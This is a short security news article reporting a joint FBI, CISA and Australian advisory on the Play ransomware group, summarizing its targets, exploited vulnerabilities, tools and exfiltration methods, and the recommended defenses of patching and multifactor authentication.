The Play ransomware has targeted nearly 300 organizations, including private companies and critical infrastructure in the US, Europe and South America, the FBI, CISA and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) have warned.
The three agencies have published a joint security advisory detailing Indicators of Compromise (IoCs) and tactics, techniques, and procedures (TTPs) observed in the Play ransomware attacks. The advisory notes that in Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware operation employs a double-extortion model, encrypting systems after exfiltrating data. The hackers gain initial access to victim networks via valid accounts and exploitation of known vulnerabilities, including FortiOS flaws (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell CVE-2022-41040 and CVE-2022-41082) vulnerabilities. Play ransomware actors have been observed to use external-facing services such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
In December 2022, Play was observed using a new exploit chain (OWASSRF) to bypass ProxyNotShell mitigations to achieve remote code execution on vulnerable servers through Outlook Web Access (OWA).
The group uses multiple tools to evade detection and disable anti-virus products (AdFind and Grixba, GMER, IOBit, and PowerTool), and to move laterally within the victim network (CobaltStrike, SystemBC, PsExec, and Mimicatz).
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files into .RAR format for exfiltration. The actors then use WinSCP to transfer data from a compromised network to accounts under their control.
According to a November report from Adlumin researchers, operators behind the Play ransomware are now offering the malware under the Ransomware-as-a-Service business model.
Organizations are strongly advised to adhere to cybersecurity best practices such as regularly patching and updating software and applications, as well as enabling multifactor authentication (MFA) for all services to the extent possible to prevent Play ransomware attacks.
